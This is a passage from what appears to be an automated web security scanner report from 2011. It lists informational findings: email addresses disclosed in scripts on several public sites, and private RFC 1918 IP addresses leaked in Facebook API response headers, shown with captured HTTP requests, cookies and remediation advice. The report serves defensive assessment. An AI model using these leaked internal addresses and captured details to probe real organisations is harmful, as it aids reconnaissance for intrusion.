anonymous-disqus@lifescript.com
community@lifescript.com

Request

Response

22.57. http://www.lifescript.com/js/jquery.innerfade.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lifescript.com
Path:	/js/jquery.innerfade.js

Issue detail

The following email address was disclosed in the response:

t.baldes@medienfreunde.com

Request

GET /js/jquery.innerfade.js HTTP/1.1
Host: www.lifescript.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

Response

HTTP/1.1 200 OK
Content-Length: 5053
Content-Type: application/x-javascript
Last-Modified: Tue, 19 Jul 2011 21:27:13 GMT
Accept-Ranges: bytes
ETag: "b2c65da05a46cc1:1fea"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="CAO CNT COM CUR DEV DSP NAV OUR PSA PSD SAM STA TAI UNI"
Date: Thu, 21 Jul 2011 19:21:52 GMT
Connection: close

/* =========================================================

// jquery.innerfade.js

// Datum: 2008-02-14
// Firma: Medienfreunde Hofmann & Baldes GbR
// Author: Torsten Baldes
// Mail: t.baldes@medienfreunde.com
// Web: http://medienfreunde.com

// based on the work of Matt Oakes http://portfolio.gizone.co.uk/applications/slideshow/
// and Ralf S. Engelschall http://trainofthoughts.org/

*
* <ul id=
...[SNIP]...

22.58. http://www.observer.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.observer.com
Path:	/

Issue detail

The following email address was disclosed in the response:

tips@observer.com

Request

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 17:39:39 GMT
Server: VoxCAST
Set-Cookie: w3tc_referrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DNew%2BYork%2BObserver; path=/
Last-Modified: Thu, 21 Jul 2011 17:39:08 GMT
X-Powered-By: W3 Total Cache/0.9.2.2
Vary: Accept-Encoding,Cookie
X-Pingback: http://www.observer.com/xmlrpc.php
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 54611
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML>
<html dir="ltr" lang="en-US">
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<!--[if lt IE 9]>
<script src="http://html5shim.google
...[SNIP]...
<a class="tip-us" target="_new" href="mailto:tips@observer.com">
...[SNIP]...

22.59. http://www.paloaltonetworks.com/js/plugins/jquery.colorbox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.paloaltonetworks.com
Path:	/js/plugins/jquery.colorbox.js

Issue detail

The following email address was disclosed in the response:

jack@colorpowered.com

Request

GET /js/plugins/jquery.colorbox.js HTTP/1.1
Host: www.paloaltonetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paloaltonetworks.com/cam/switch/index.php?ts=scmag
Cookie: X-Mapping-mkmfjdci=CCDCC4EE41D6AB1FEC3D09C002EBB5F8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: application/x-javascript
Date: Fri, 22 Jul 2011 20:12:08 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 17 May 2011 19:47:09 GMT
Content-Length: 9020
Connection: Keep-Alive
X-Cache-Info: cached

// ColorBox v1.3.9 - a full featured, light-weight, customizable lightbox based on jQuery 1.3
// c) 2009 Jack Moore - www.colorpowered.com - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(b,gb){var v="none",t="click",N="LoadedContent",d=false,x="resize.",o="y",u="auto",f=true,M="nofollow",q=
...[SNIP]...

22.60. http://www.scmagazineus.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scmagazineus.com
Path:	/

Issue detail

The following email address was disclosed in the response:

kathleen.merot@haymarketmedia.com

Request

Response

22.61. http://www.silverpop.com/Scripts/new-banners.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverpop.com
Path:	/Scripts/new-banners.js

Issue detail

The following email address was disclosed in the response:

jablan@silverpop.com

Request

GET /Scripts/new-banners.js HTTP/1.1
Host: www.silverpop.com
Proxy-Connection: keep-alive
Referer: http://www.silverpop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:52:51 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 19 Apr 2011 13:56:07 GMT
ETag: "c1cf84-1458-dea4cbc0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 5208
Content-Type: application/x-javascript

/*
* new-banners.js
*
* Copyright (c) 2010 Silverpop Systems, Inc.
* @author Jerry Ablan <jablan@silverpop.com>
* @link http://www.silverpop.com Silverpop Systems, Inc.
*/

var _resize
...[SNIP]...

22.62. http://www.silverpop.com/preferences_sf/preferences_sf.js.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverpop.com
Path:	/preferences_sf/preferences_sf.js.php

Issue detail

The following email address was disclosed in the response:

mark@allmarkedup.com

Request

GET /preferences_sf/preferences_sf.js.php HTTP/1.1
Host: www.silverpop.com
Proxy-Connection: keep-alive
Referer: http://www.silverpop.com/demo/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:53:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 86659
Content-Type: text/javascript

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
=================================================
*
* JQuery URL Parser
* Version 1.0
* Parses URLs and provides easy access to information within them.
*
* Author: Mark Perkins
* Author email: mark@allmarkedup.com
*
* For full documentation and more go to http://projects.allmarkedup.com/jquery_url_parser/
*
* ---------------------------------------------------------------------------
*
* CREDITS:
*
* Pa
...[SNIP]...

22.63. http://www.treehugger.com/h-code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.treehugger.com
Path:	/h-code.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /h-code.js HTTP/1.1
Host: www.treehugger.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14
Last-Modified: Thu, 19 Nov 2009 18:51:23 GMT
ETag: "1626b53-799b-478bdd87c00c0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 31131
Date: Sat, 23 Jul 2011 13:19:04 GMT
Connection: close

/* SiteCatalyst code version: H.20.3.
Discovery Interactive version 1.7.5th - Digital Media | Treehugger
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */

/*******
...[SNIP]...
7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=
...[SNIP]...

22.64. http://www.treehugger.com/scripts/colorbox/jquery.colorbox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.treehugger.com
Path:	/scripts/colorbox/jquery.colorbox.js

Issue detail

The following email address was disclosed in the response:

jack@colorpowered.com

Request

GET /scripts/colorbox/jquery.colorbox.js HTTP/1.1
Host: www.treehugger.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14
Last-Modified: Thu, 21 Apr 2011 19:56:06 GMT
ETag: "628c-4a17321ba2180"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 25228
Date: Sat, 23 Jul 2011 13:19:04 GMT
Connection: close

// ColorBox v1.3.16 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2011 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function ($, document, window) {
   var
   // ColorBox Default Settings.
   // See http://colorpowered.com/colorb
...[SNIP]...

22.65. http://www.vostu.com/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vostu.com
Path:	/en/

Issue detail

The following email address was disclosed in the response:

info@vostu.com

Request

GET /en/ HTTP/1.1
Host: www.vostu.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geoip_language=en

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:10:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.1
X-Pingback: http://www.vostu.com/en/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 16381
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
<a href="mailto:info@vostu.com ">
...[SNIP]...

22.66. http://www.vostu.com/en/2011/04/20/megacity-takes-brazil-by-storm/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vostu.com
Path:	/en/2011/04/20/megacity-takes-brazil-by-storm/

Issue detail

The following email address was disclosed in the response:

info@vostu.com

Request

GET /en/2011/04/20/megacity-takes-brazil-by-storm/ HTTP/1.1
Host: www.vostu.com
Proxy-Connection: keep-alive
Referer: http://www.vostu.com/en/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geoip_language=en; __utma=32124601.79039334.1311275451.1311275451.1311275451.1; __utmb=32124601.4.10.1311275451; __utmc=32124601; __utmz=32124601.1311275451.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:13:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.1
X-Pingback: http://www.vostu.com/en/xmlrpc.php
Link: <http://www.vostu.com/en/?p=187>; rel=shortlink
Vary: Accept-Encoding
Content-Length: 12125
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
<a href="mailto:info@vostu.com ">
...[SNIP]...

22.67. http://www.vostu.com/en/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vostu.com
Path:	/en/news/

Issue detail

The following email address was disclosed in the response:

info@vostu.com

Request

GET /en/news/ HTTP/1.1
Host: www.vostu.com
Proxy-Connection: keep-alive
Referer: http://www.vostu.com/en/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geoip_language=en; __utma=32124601.79039334.1311275451.1311275451.1311275451.1; __utmb=32124601.2.10.1311275451; __utmc=32124601; __utmz=32124601.1311275451.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:11:05 GMT
Server: Apache
X-Powered-By: PHP/5.3.1
X-Pingback: http://www.vostu.com/en/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 15070
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
<a href="mailto:info@vostu.com ">
...[SNIP]...

23. Private IP addresses disclosed previous next
There are 183 instances of this issue:

http://api.facebook.com/restserver.php
http://api.facebook.com/restserver.php
http://api.facebook.com/restserver.php
http://api.facebook.com/restserver.php
http://api.facebook.com/restserver.php
http://api.facebook.com/restserver.php
http://assets.0.mybcdna.com//images/HomeBeforeLogin/btn_sign_up_free.png
http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js
http://assets.0.mybcdna.com/images/games/tiles/19_medium.gif
http://assets.0.mybcdna.com/images/games/tiles/57_medium.gif
http://assets.2.mybcdna.com//images/favicon.ico
http://assets.2.mybcdna.com/css/apps/HomeBeforeLogin/hblv2.css
http://assets.2.mybcdna.com/images/Connect/hbl_login_divider.png
http://assets.2.mybcdna.com/images/HomeBeforeLogin/background_content.png
http://assets.2.mybcdna.com/images/HomeBeforeLogin/feed_logos.png
http://assets.2.mybcdna.com/images/HomeBeforeLogin/feed_nav_icons.png
http://assets.2.mybcdna.com/images/HomeBeforeLogin/login_button.png
http://assets.2.mybcdna.com/images/Navbar/nav_sprite_default.png
http://assets.2.mybcdna.com/images/games/tiles/81_medium.gif
http://assets.2.mybcdna.com/images/gradient_sprite.png
http://assets.2.mybcdna.com/images/header_sprite.png
http://assets.3.mybcdna.com/images/PremiumGifts/pg_wrap2_orange.jpg
http://assets.5.mybcdna.com/images/PremiumGifts/pg_wrap2_summer2.jpg
http://assets.6.mybcdna.com/images/games/tiles/30_medium.gif
http://assets.myyearbook.com/images/games/partnerAds/fourplay.png
http://assets.myyearbook.com/nerve/css/nerve.css
http://assets.myyearbook.com/nerve/js/nerve.js
http://ch2lb.checkm8.com/adam/cm8_detect_ad.js
http://ch2lb.checkm8.com/data/420913/presitial_SC_logo.gif
http://ch2lb.checkm8.com/data/442707/Nom_640x480.gif
http://connect.facebook.net/en_US/all.js
http://connect.facebook.net/en_US/all.js
http://connect.facebook.net/en_US/all.js
http://connect.facebook.net/en_US/all.js
http://connect.facebook.net/en_US/all.js
http://games.myyearbook.com/
http://games.myyearbook.com/landing/pool
http://home.myyearbook.com/Countries
http://home.myyearbook.com/favicon.ico
http://home.myyearbook.com/feed/giftFeedItems
http://home.myyearbook.com/feed/myMagFeedItems
http://home.myyearbook.com/feed/tvFeedItems
http://myyearbook.com/
http://player.vimeo.com/video/18305022
http://player.vimeo.com/video/25752549
http://player.vimeo.com/video/25752549
http://player.vimeo.com/video/26341323
http://player.vimeo.com/video/8022406
http://player.vimeo.com/video/8022406
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://research.microsoft.com/en-us/
http://research.microsoft.com/en-us/downloads/cecba376-3d3f-4eaf-bf01-20983857c2b1/default.aspx
http://research.microsoft.com/en-us/events/fs2011/default.aspx
http://research.microsoft.com/en-us/events/fs2011/demofest.aspx
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://static.ak.fbcdn.net/connect.php/css/share-button-css
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/images/connect_sprite.png
http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/L8yUExs-fkD.js
http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/C0OtqEd7THh.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/hzcsbK-GAuH.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/v3AaEMJaNiA.js
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/yGAzEWR0-5b.js
http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/JSqaF4G1Vob.css
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/AI7cvamOOjQ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/AI7cvamOOjQ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/mfm5LaL5Ify.css
http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/znpKCeUuNfm.css
http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/znpKCeUuNfm.css
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/AQsou8r87UO.js
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/vgIBfPxn_gJ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/ay94DQdlwaE.js
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/myfphzY3EFO.js
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js
http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/jsZvfR86-A1.js
http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/jsZvfR86-A1.js
http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/ql9vukDCc4R.png
http://static.ak.fbcdn.net/rsrc.php/v1/zL/r/FGFbc80dUKj.png
http://static.ak.fbcdn.net/rsrc.php/v1/zN/r/BAsr4eOOsw6.png
http://static.ak.fbcdn.net/rsrc.php/v1/zW/r/0t0iUYDtV0L.png
http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png
http://static.ak.fbcdn.net/rsrc.php/v1/zf/r/_IKHHfAgFQe.png
http://static.ak.fbcdn.net/rsrc.php/v1/zj/r/FSEB6oLTK3I.png
http://takeover.myyearbook.com/6443/main_image.jpg
http://web2.checkm8.com/adam/detect
http://web2.checkm8.com/adam/em/ad_play/442707/cat=47183/uhook=6DF1BDD4075B/criterias=32_0_43_3_103_18_104_12_116_225_117_225045_118_1_120_4000000100_122_4225045100_280_22_282_0_283_0_/ord=8851318688487949
http://web2.checkm8.com/dispatcher_scripts/browserDataDetect.js
http://www.facebook.com/connect/connect.php
http://www.facebook.com/connect/connect.php
http://www.facebook.com/connect/connect.php
http://www.facebook.com/connect/connect.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/comments.php
http://www.facebook.com/plugins/fan.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.google.com/sdch/StnTz5pY.dct
http://www.myyearbook.com/advertising/default.php
http://www.myyearbook.com/advertising/default.php
http://www.myyearbook.com/advertising/default.php
http://www.myyearbook.com/favicon.ico
http://www.myyearbook.com/favicon.ico
http://www.myyearbook.com/favicon.ico
http://www.myyearbook.com/favicon.ico
http://www.myyearbook.com/favicon.ico

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

23.1. http://api.facebook.com/restserver.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.5.39

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FHow_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Thu, 21 Jul 2011 12:24:09 -0700
Pragma:
X-FB-Rev: 408827
X-FB-Server: 10.42.5.39
X-Cnection: close
Date: Thu, 21 Jul 2011 19:22:09 GMT
Content-Length: 393

fb_sharepro_render([{"url":"http:\/\/www.lifescript.com\/Health\/Conditions\/ADD\/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx","normalized_url":"http:\/\/www.lifescript.com\/Health\/Conditions\/ADD\/
...[SNIP]...

23.2. http://api.facebook.com/restserver.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.13.43

Request

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Thu, 21 Jul 2011 12:26:17 -0700
Pragma:
X-FB-Rev: 408827
X-FB-Server: 10.42.13.43
X-Cnection: close
Date: Thu, 21 Jul 2011 19:24:17 GMT
Content-Length: 393

fb_sharepro_render([{"url":"http:\/\/www.lifescript.com\/Health\/Conditions\/ADD\/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx","normalized_url":"http:\/\/www.lifescript.com\/Health\/Conditions\/ADD\/
...[SNIP]...

23.3. http://api.facebook.com/restserver.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.23.41

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FOut_of_Control_It_Could_Be_ADHD.aspx%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Thu, 21 Jul 2011 12:26:22 -0700
Pragma:
X-FB-Rev: 408827
X-FB-Server: 10.42.23.41
X-Cnection: close
Date: Thu, 21 Jul 2011 19:24:22 GMT
Content-Length: 373

fb_sharepro_render([{"url":"http:\/\/www.lifescript.com\/Health\/Conditions\/ADD\/Out_of_Control_It_Could_Be_ADHD.aspx","normalized_url":"http:\/\/www.lifescript.com\/Health\/Conditions\/ADD\/Out_of_C
...[SNIP]...

23.4. http://api.facebook.com/restserver.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php
